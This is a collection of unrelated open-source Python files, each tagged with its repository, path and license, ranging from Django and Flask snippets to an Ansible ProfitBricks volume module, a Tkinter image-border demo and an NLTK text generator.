hook_a.reset_mock()
hook_b.reset_mock()
self.assertFalse(proxy.is_valid())
hook_a.is_valid.assert_called_once_with()
hook_b.is_valid.assert_called_once_with()
# if there are no hooks registered, should be valid
proxy2 = HookProxy([])
self.assertTrue(proxy2.is_valid())
def test_context(self):
hook_a = mock.MagicMock()
hook_b = mock.MagicMock()
hook_a.context = {"hook_a": "foo", }
hook_b.context = {"hook_b": "foo", }
proxy = HookProxy([])
proxy._hooks = [hook_a, hook_b]
self.assertDictEqual(proxy.context, {"hook_a": "foo", "hook_b": "foo"})
class HookTest(TestCase):
def setUp(self):
pass
def test_register(self):
class BadHook:
""""""
class GoodHook(HookBase):
""""""
hook = Hook()
self.assertRaises(AssertionError, hook.register, BadHook)
self.assertRaises(AssertionError, hook.register, GoodHook("req"))
hook.register(GoodHook)
self.assertListEqual(hook._registry, [GoodHook, ])
def test_unregister(self):
class GoodHook(HookBase):
""""""
hook = Hook()
hook.register(GoodHook)
self.assertListEqual(hook._registry, [GoodHook, ])
hook.unregister(GoodHook)
self.assertListEqual(hook._registry, [])
# calling unregister again should do nothing
hook.unregister(GoodHook)
self.assertListEqual(hook._registry, [])
def test_call(self):
hook = Hook()
with mock.patch.object(HookProxy, '__init__') as mock_init:
mock_init.return_value = None
proxy = hook("foo", extra="bar")
mock_init.assert_called_once_with(hook._registry, "foo", extra="bar")
self.assertIsInstance(proxy, HookProxy)
| nitely/django-hooks | hooks/tests/tests_viewhook.py | Python | mit | 4,892 |
import datetime
import time
import hlib.error
import hlib.tests
import tests
class AbstractWait(object):
DEFAULT_TIMEOUT = 10
DEFAULT_DELAY = 0.5
def __init__(self, cond, timeout = None, delay = None):
super(AbstractWait, self).__init__()
self.cond = cond
self.timeout = timeout or AbstractWait.DEFAULT_TIMEOUT
self.delay = delay or AbstractWait.DEFAULT_DELAY
def condition_test(self):
raise hlib.error.UnimplementedError(obj = AbstractWait)
def wait(self, fail = True):
wait_until = datetime.datetime.now() + datetime.timedelta(seconds = self.timeout)
while True:
if self.condition_test():
return True
current_time = datetime.datetime.now()
if current_time >= wait_until:
break
time.sleep(self.delay)
if fail:
assert False, 'Waiting failed: condition="%s"' % str(self.cond)
return False
class Condition(object):
def __init__(self):
super(Condition, self).__init__()
#
# "Wait for ..." classes
#
class WaitUntil(AbstractWait):
def condition_test(self):
return self.cond()
class WaitWhile(AbstractWait):
def condition_test(self):
return not self.cond()
#
# Browser conditions
#
class BrowserCondition(Condition):
def __init__(self, browser):
super(BrowserCondition, self).__init__()
self.browser = browser
class BrowserHasURL(BrowserCondition):
def __init__(self, browser, url):
super(BrowserHasURL, self).__init__(browser)
self.url = url
def __str__(self):
    return 'Browser is on page with URL %s' % self.url
def __call__(self):
return self.browser.url == self.url
class BrowserHasElement(BrowserCondition):
def __init__(self, browser, lookup, *args):
    super(BrowserHasElement, self).__init__(browser)
self.lookup = lookup
self.args = args
def __str__(self):
return 'Browser has element %s(%s)' % (self.lookup, self.args)
def __call__(self):
return getattr(self.browser, self.lookup)(*self.args)
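# A minimal usage sketch (not part of the original module): conditions are
# wrapped in WaitUntil/WaitWhile and polled until they hold or time out.
# The "browser" argument and the URL below are illustrative assumptions.
def example_wait_usage(browser):
  cond = BrowserHasURL(browser, 'http://localhost/login')
  # poll every 0.2s for up to 5s; fails the test on timeout
  WaitUntil(cond, timeout = 5, delay = 0.2).wait(fail = True)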
| happz/settlers | tests/web/conditions/__init__.py | Python | mit | 1,964 |
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example updates ad unit sizes by adding a banner ad size.
To determine which ad units exist, run get_all_ad_units.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Set the ID of the ad unit to get.
AD_UNIT_ID = 'INSERT_AD_UNIT_ID_HERE'
def main(client, ad_unit_id):
# Initialize appropriate service.
inventory_service = client.GetService('InventoryService', version='v202111')
# Create a statement to select a single ad unit by ID.
statement = (ad_manager.StatementBuilder(version='v202111')
.Where('id = :id')
.WithBindVariable('id', ad_unit_id))
# Get ad units by statement.
response = inventory_service.getAdUnitsByStatement(
statement.ToStatement())
# Add the size 468x60 to the ad unit.
ad_unit_size = {
'size': {
'width': '468',
'height': '60'
},
'environmentType': 'BROWSER'
}
if 'results' in response and len(response['results']):
updated_ad_units = []
for ad_unit in response['results']:
if 'adUnitSizes' not in ad_unit:
ad_unit['adUnitSizes'] = []
ad_unit['adUnitSizes'].append(ad_unit_size)
updated_ad_units.append(ad_unit)
# Update ad unit on the server.
ad_units = inventory_service.updateAdUnits(updated_ad_units)
# Display results.
for ad_unit in ad_units:
ad_unit_sizes = ['{%s x %s}' % (size['size']['width'],
size['size']['height'])
for size in ad_unit['adUnitSizes']]
print('Ad unit with ID "%s", name "%s", and sizes [%s] was updated'
% (ad_unit['id'], ad_unit['name'], ','.join(ad_unit_sizes)))
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, AD_UNIT_ID)
| googleads/googleads-python-lib | examples/ad_manager/v202111/inventory_service/update_ad_units.py | Python | apache-2.0 | 2,750 |
from django.conf.urls import patterns, include, url
from .views import BandwidthHomeView
bandwidth_urls = patterns('',
url(
r'^$',
BandwidthHomeView.as_view(),
name='list'
),
# url(
# r'bandwidth/(?P<pk>[0-9]+)/$',
# BandwidthTestDetail.as_view(),
# name='retrieveupdatedestroy'
# ),
)
urlpatterns = patterns('',
url(r'^', include(bandwidth_urls, namespace='bandwidthtest')),
)
| hellsgate1001/graphs | bandwidthtest/urls.py | Python | mit | 450 |
#!/usr/bin/env python3
# imports go here
from gevent import monkey
monkey.patch_all()
import time
from threading import Thread
import urllib.request
from flask import Flask, render_template
from flask.ext.socketio import SocketIO
from flask_debugtoolbar import DebugToolbarExtension
#
# Free Coding session for 2015-02-12
# Written by Matt Warren
#
app = Flask(__name__)
app.config['SECRET_KEY'] = 'oaisndviouhwdnvilxuanbodni'
app.debug = True
socketio = SocketIO(app)
toolbar = DebugToolbarExtension(app)
thread = None
SITES = [
'http://halotis.com',
'http://mattwarren.co',
'http://columfurey.com',
'http://www.routeburn.co',
'http://persistenceapp.com'
]
def update_website_status():
site_status = {}
for site in SITES:
        site_status[site] = urllib.request.urlopen(site).getcode()
return site_status
def background_thread():
"""Example of how to send server generated events to clients."""
while True:
status = update_website_status()
socketio.emit('my response',
{'data': 'Server generated event', 'statuses': status},
namespace='')
time.sleep(10)
@app.route('/')
def index():
global thread
if thread is None:
thread = Thread(target=background_thread)
thread.start()
return render_template('index.html')
@socketio.on('event')
def message(message):
    pass  # this seems to initialize the socket io
if __name__ == '__main__':
socketio.run(app)
| mfwarren/FreeCoding | 2015/02/fc_2015_02_12.py | Python | mit | 1,492 |
"""Ttk Frame with rounded corners.
Based on an example by Bryan Oakley, found at: http://wiki.tcl.tk/20152"""
import Tkinter
import ttk
root = Tkinter.Tk()
img1 = Tkinter.PhotoImage("frameFocusBorder", data="""
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
Ry/99NIz//oGrZpUUEAAOw==""")
img2 = Tkinter.PhotoImage("frameBorder", data="""
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""")
style = ttk.Style()
style.element_create("RoundedFrame", "image", "frameBorder",
("focus", "frameFocusBorder"), border=16, sticky="nsew")
style.layout("RoundedFrame", [("RoundedFrame", {"sticky": "nsew"})])
style.configure("TEntry", borderwidth=0)
frame = ttk.Frame(style="RoundedFrame", padding=10)
frame.pack(fill='x')
frame2 = ttk.Frame(style="RoundedFrame", padding=10)
frame2.pack(fill='both', expand=1)
entry = ttk.Entry(frame, text='Test')
entry.pack(fill='x')
entry.bind("<FocusIn>", lambda evt: frame.state(["focus"]))
entry.bind("<FocusOut>", lambda evt: frame.state(["!focus"]))
text = Tkinter.Text(frame2, borderwidth=0, bg="white", highlightthickness=0)
text.pack(fill='both', expand=1)
text.bind("<FocusIn>", lambda evt: frame2.state(["focus"]))
text.bind("<FocusOut>", lambda evt: frame2.state(["!focus"]))
root.mainloop()
| teeple/pns_server | work/install/Python-2.7.4/Demo/tkinter/ttk/roundframe.py | Python | gpl-2.0 | 5,601 |
# -*- coding: utf-8 -*-
# This file is part of Pate, Kate' Python scripting plugin.
#
# Copyright (C) 2013 Alex Turbov <i.zaufi@gmail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) version 3.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public License
# along with this library; see the file COPYING.LIB. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
'''Decorators used in plugins to handle document events'''
import sys
from PyQt4 import QtCore
from ..api import kDebug
from ..document_view_helpers import _make_sure_subscribers_queue_exists, _on_view_created, _SubscriberInfo
def _queue_document_event_subscriber(signal, receiver):
'''Helper function to register a new handler'''
plugin = sys._getframe(2).f_globals['__name__']
_make_sure_subscribers_queue_exists(plugin, _on_view_created, 'document_event_subscribers')
_on_view_created.document_event_subscribers[plugin].append(_SubscriberInfo(signal, receiver))
#
# Document events to subscribe from plugins
#
# http://api.kde.org/4.x-api/kdelibs-apidocs/interfaces/ktexteditor/html/classKTextEditor_1_1Document.html
#
# TODO Add more inherited signals?
#
def aboutToClose(receiver):
_queue_document_event_subscriber(
'aboutToClose(KTextEditor::Document*)'
, receiver
)
return receiver
def aboutToReload(receiver):
_queue_document_event_subscriber(
'aboutToReload(KTextEditor::Document*)'
, receiver
)
return receiver
def documentNameChanged(receiver):
_queue_document_event_subscriber(
'documentNameChanged(KTextEditor::Document*)'
, receiver
)
return receiver
def documentSavedOrUploaded(receiver):
_queue_document_event_subscriber(
'documentSavedOrUploaded(KTextEditor::Document*, bool)'
, receiver
)
return receiver
def documentUrlChanged(receiver):
_queue_document_event_subscriber(
'documentUrlChanged(KTextEditor::Document*)'
, receiver
)
return receiver
def exclusiveEditEnd(receiver):
_queue_document_event_subscriber(
'exclusiveEditEnd(KTextEditor::Document*)'
, receiver
)
return receiver
def exclusiveEditStart(receiver):
_queue_document_event_subscriber(
'exclusiveEditStart(KTextEditor::Document*)'
, receiver
)
return receiver
def highlightingModeChanged(receiver):
_queue_document_event_subscriber(
'highlightingModeChanged(KTextEditor::Document*)'
, receiver
)
return receiver
def modeChanged(receiver):
_queue_document_event_subscriber(
'modeChanged(KTextEditor::Document*)'
, receiver
)
return receiver
def modifiedChanged(receiver):
_queue_document_event_subscriber(
'modifiedChanged(KTextEditor::Document*)'
, receiver
)
return receiver
def reloaded(receiver):
_queue_document_event_subscriber(
'reloaded(KTextEditor::Document*)'
, receiver
)
return receiver
def textChanged(receiver):
_queue_document_event_subscriber(
'textChanged(KTextEditor::Document*, const KTextEditor::Range&, const QString&, const KTextEditor::Range&)'
, receiver
)
return receiver
def textInserted(receiver):
_queue_document_event_subscriber(
'textInserted(KTextEditor::Document*, const KTextEditor::Range&)'
, receiver
)
return receiver
def textRemoved(receiver):
_queue_document_event_subscriber(
'textRemoved(KTextEditor::Document*, const KTextEditor::Range&, const QString&)'
, receiver
)
return receiver
def viewCreated(receiver):
_queue_document_event_subscriber(
'viewCreated(KTextEditor::Document*, KTextEditor::View*)'
, receiver
)
return receiver
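# A minimal usage sketch (not part of the original module): inside a Pate
# plugin, a handler is registered simply by decorating a module-level
# function; the handler and parameter names below are illustrative assumptions.
#
#     from kate.document.decorators import documentUrlChanged
#
#     @documentUrlChanged
#     def on_url_changed(document):
#         print('url changed for %s' % document.documentName())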
| hlamer/kate | addons/kate/pate/src/kate/document/decorators.py | Python | lgpl-2.1 | 4,321 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('bufftracker', '0007_auto_20150530_0053'),
]
operations = [
migrations.AlterModelOptions(
name='casterlevelformula',
options={'ordering': ('displayed_formula',)},
),
]
| Ernir/bufftracker | bufftracker/migrations/0008_auto_20150829_1933.py | Python | mit | 399 |
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: profitbricks_volume_attachments
short_description: Attach or detach a volume.
description:
- Allows you to attach or detach a volume from a ProfitBricks server. This module has a dependency on profitbricks >= 1.0.0
version_added: "2.0"
options:
datacenter:
description:
- The datacenter in which to operate.
required: true
server:
description:
      - The name of the server to attach the volume to or detach it from.
required: true
volume:
description:
- The volume name or ID.
required: true
subscription_user:
description:
- The ProfitBricks username. Overrides the PB_SUBSCRIPTION_ID environment variable.
required: false
subscription_password:
description:
      - The ProfitBricks password. Overrides the PB_PASSWORD environment variable.
required: false
wait:
description:
- wait for the operation to complete before returning
required: false
default: "yes"
choices: [ "yes", "no" ]
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 600
state:
description:
- Indicate desired state of the resource
required: false
default: 'present'
choices: ["present", "absent"]
requirements: [ "profitbricks" ]
author: Matt Baldwin (baldwin@stackpointcloud.com)
'''
EXAMPLES = '''
# Attach a Volume
- profitbricks_volume_attachments:
datacenter: Tardis One
server: node002
volume: vol01
wait_timeout: 500
state: present
# Detach a Volume
- profitbricks_volume_attachments:
datacenter: Tardis One
server: node002
volume: vol01
wait_timeout: 500
state: absent
'''
import re
import time
HAS_PB_SDK = True
try:
from profitbricks.client import ProfitBricksService
except ImportError:
HAS_PB_SDK = False
from ansible.module_utils.basic import AnsibleModule
uuid_match = re.compile(
r'[\w]{8}-[\w]{4}-[\w]{4}-[\w]{4}-[\w]{12}', re.I)
def _wait_for_completion(profitbricks, promise, wait_timeout, msg):
if not promise:
return
wait_timeout = time.time() + wait_timeout
while wait_timeout > time.time():
time.sleep(5)
operation_result = profitbricks.get_request(
request_id=promise['requestId'],
status=True)
if operation_result['metadata']['status'] == "DONE":
return
elif operation_result['metadata']['status'] == "FAILED":
raise Exception(
'Request failed to complete ' + msg + ' "' + str(
promise['requestId']) + '" to complete.')
raise Exception(
'Timed out waiting for async operation ' + msg + ' "' + str(
promise['requestId']
) + '" to complete.')
def attach_volume(module, profitbricks):
"""
Attaches a volume.
This will attach a volume to the server.
module : AnsibleModule object
profitbricks: authenticated profitbricks object.
Returns:
True if the volume was attached, false otherwise
"""
datacenter = module.params.get('datacenter')
server = module.params.get('server')
volume = module.params.get('volume')
# Locate UUID for Datacenter
if not (uuid_match.match(datacenter)):
datacenter_list = profitbricks.list_datacenters()
for d in datacenter_list['items']:
dc = profitbricks.get_datacenter(d['id'])
if datacenter == dc['properties']['name']:
datacenter = d['id']
break
# Locate UUID for Server
if not (uuid_match.match(server)):
server_list = profitbricks.list_servers(datacenter)
for s in server_list['items']:
if server == s['properties']['name']:
                server = s['id']
break
# Locate UUID for Volume
if not (uuid_match.match(volume)):
volume_list = profitbricks.list_volumes(datacenter)
for v in volume_list['items']:
if volume == v['properties']['name']:
volume = v['id']
break
return profitbricks.attach_volume(datacenter, server, volume)
def detach_volume(module, profitbricks):
"""
Detaches a volume.
This will remove a volume from the server.
module : AnsibleModule object
profitbricks: authenticated profitbricks object.
Returns:
True if the volume was detached, false otherwise
"""
datacenter = module.params.get('datacenter')
server = module.params.get('server')
volume = module.params.get('volume')
# Locate UUID for Datacenter
if not (uuid_match.match(datacenter)):
datacenter_list = profitbricks.list_datacenters()
for d in datacenter_list['items']:
dc = profitbricks.get_datacenter(d['id'])
if datacenter == dc['properties']['name']:
datacenter = d['id']
break
# Locate UUID for Server
if not (uuid_match.match(server)):
server_list = profitbricks.list_servers(datacenter)
for s in server_list['items']:
if server == s['properties']['name']:
                server = s['id']
break
# Locate UUID for Volume
if not (uuid_match.match(volume)):
volume_list = profitbricks.list_volumes(datacenter)
for v in volume_list['items']:
if volume == v['properties']['name']:
volume = v['id']
break
return profitbricks.detach_volume(datacenter, server, volume)
def main():
module = AnsibleModule(
argument_spec=dict(
datacenter=dict(),
server=dict(),
volume=dict(),
subscription_user=dict(),
subscription_password=dict(no_log=True),
wait=dict(type='bool', default=True),
wait_timeout=dict(type='int', default=600),
state=dict(default='present'),
)
)
if not HAS_PB_SDK:
module.fail_json(msg='profitbricks required for this module')
if not module.params.get('subscription_user'):
module.fail_json(msg='subscription_user parameter is required')
if not module.params.get('subscription_password'):
module.fail_json(msg='subscription_password parameter is required')
if not module.params.get('datacenter'):
module.fail_json(msg='datacenter parameter is required')
if not module.params.get('server'):
module.fail_json(msg='server parameter is required')
if not module.params.get('volume'):
module.fail_json(msg='volume parameter is required')
subscription_user = module.params.get('subscription_user')
subscription_password = module.params.get('subscription_password')
profitbricks = ProfitBricksService(
username=subscription_user,
password=subscription_password)
state = module.params.get('state')
if state == 'absent':
try:
(changed) = detach_volume(module, profitbricks)
module.exit_json(changed=changed)
except Exception as e:
module.fail_json(msg='failed to set volume_attach state: %s' % str(e))
elif state == 'present':
try:
attach_volume(module, profitbricks)
module.exit_json()
except Exception as e:
module.fail_json(msg='failed to set volume_attach state: %s' % str(e))
if __name__ == '__main__':
main()
| tsdmgz/ansible | lib/ansible/modules/cloud/profitbricks/profitbricks_volume_attachments.py | Python | gpl-3.0 | 7,795 |
import nltk, os, sys
from nltk.corpus import PlaintextCorpusReader
class ASOIFGenerator:
def __init__(self):
curr_dir = os.getcwd()
        # didn't include this folder in git,
# because i'm not looking to get a cease and desist notice
wordlists = PlaintextCorpusReader(curr_dir+"/ASOIAF/", ".*\.txt")
self.words = wordlists.words()
# get cfg tri and bigrams
trigrams = nltk.trigrams(self.words)
self.cfd_t = nltk.ConditionalFreqDist()
for t in list(trigrams):
self.cfd_t[t[0]+"|"+t[1]][t[2]] += 1
bigrams = nltk.bigrams(self.words)
self.cfd_b = nltk.ConditionalFreqDist(bigrams)
#
# use bigram only to generate
#
def generate_bigram_dumb(self, word0, n=15):
for i in range(n):
print(word0)
word0 = self.cfd_b[word0].max()
#
# use bigram and then trigram to generate
#
def generate_bigram(self, word0, n=15):
word1 = self.cfd_b[word0].max()
self.generate_trigram(word0, word1, n)
#
# use trigram to generate
#
def generate_trigram(self, word0, word1, n=15):
print(word0)
for i in range(n):
print(word1)
word2 = self.cfd_t[word0+"|"+word1].max()
word0 = word1
word1 = word2
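# A minimal usage sketch (not part of the original script): build the model
# from the local corpus and emit 15 words from a seed word; the seed word is
# an illustrative assumption and the ASOIAF/ corpus folder must exist.
if __name__ == "__main__":
    gen = ASOIFGenerator()
    gen.generate_bigram("Winter", n=15)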
| rharriso/nltk-workspace | ASOIF_trigram_gen.py | Python | apache-2.0 | 1,336 |
#!/usr/bin/env python3
import math
def multinomial(n, digits=7):
n=str(n).zfill(digits)
temp={}
for i in n:
if not i in temp:
temp[i]=0
temp[i]+=1
out=math.factorial(digits)
for i in temp:
out//=math.factorial(temp[i])
return out
def Memoize(func):
cache={}
def inner(n):
n=scrub(n)
if not n in cache:
cache[n]=func(n)
return cache[n]
return inner
def square_digit_sum(n):
n=str(n)
return sum(int(i)**2 for i in n)
def scrub(n):
n=[i for i in str(n) if not i=="0"]
n.sort()
return int("".join(n))
@Memoize
def arrives_at_89(n):
while True:
if n==1:
return False
elif n==89:
return True
n=square_digit_sum(n)
def wrapper(n):
n=square_digit_sum(n)
return arrives_at_89(n)
def pre_requisites(n):
a=int(n**0.5)
for i in range(1,a+1):
if ((n-i**2)**0.5).is_integer():
print(i,int((n-i**2)**0.5))
def main(upper=7):
count=0
cache={}
for i in range(1, 10**upper):
i=scrub(i)
if not i in cache:
if wrapper(i):
count+=multinomial(i, upper)
cache[i]=None
return count
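# A minimal usage sketch (not part of the original script): count how many
# starting numbers below 10**7 arrive at 89 (Project Euler problem 92); the
# published answer for that problem is 8581146.
if __name__ == "__main__":
    print(main(7))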
| Bolt64/my_code | euler/square_digit_chain.py | Python | mit | 1,255 |
#!/bin/env python
# -*- coding: utf-8; -*-
#
# (c) 2016 FABtotum, http://www.fabtotum.com
#
# This file is part of FABUI.
#
# FABUI is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# FABUI is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with FABUI. If not, see <http://www.gnu.org/licenses/>.
# Import standard python module
import os
import sys
import gettext
import signal
import argparse
import logging
import time
from datetime import datetime
# Import external modules
from watchdog.observers import Observer
from ws4py.client.threadedclient import WebSocketClient
# Import internal modules
from fabtotum.utils.translation import _, setLanguage
from fabtotum.os.paths import TEMP_PATH, RUN_PATH, PYTHON_PATH
